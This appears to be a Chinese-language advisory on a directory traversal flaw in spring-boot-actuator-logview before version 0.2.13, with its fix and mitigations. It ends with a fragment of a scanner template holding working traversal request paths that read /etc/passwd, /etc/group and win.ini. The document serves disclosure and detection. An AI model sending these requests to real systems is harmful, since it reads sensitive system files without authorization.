Spring Boot是由Pivotal團隊提供的全新框架,其設計目的是用來簡化新Spring應用的初始搭建以及開發過程。該框架使用了特定的方式來進行配置,從而使開發人員不再需要定義樣板化的配置。通過這種方式,Spring Boot致力於在蓬勃發展的快速應用開發領域(rapid application development)成為領導者。 spring-boot-actuator-logview 在一個庫中添加了一個簡單的日志文件查看器作為 spring boot 執行器端點。它是 maven 包"eu.hinsch:spring-boot-actuator-logview"。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目錄遍歷漏洞。該庫的本質是通過 admin(spring boot 執行器)HTTP 端點公開日志文件目錄。要查看的文件名和基本文件夾(相對於日志文件夾根)都可以通過請求參數指定。雖然檢查了文件名參數以防止目錄遍歷攻擊(因此`filename=../somefile` 將不起作用),但沒有充分檢查基本文件夾參數,因此`filename=somefile&base=../` 可以訪問日志記錄基目錄之外的文件)。該漏洞已在 0.2.13 版中修復。0.2.12 的任何用戶都應該能夠毫無問題地進行更新,因為該版本中沒有其他更改。除了更新或刪除依賴項之外,沒有解決此漏洞的方法。但是,刪除運行應用程序的用戶對運行應用程序不需要的任何目錄的讀取訪問權限可以限制影響。此外,可以通過在反向代理后面部署應用程序來限制對 logview 端點的訪問。
/manage/log/view?filename=/etc/group&base=../../../../../../../../../../../../
GET path: -
{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../"# Windows - "{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../"# windows - "{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../"# linux - "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../"# linux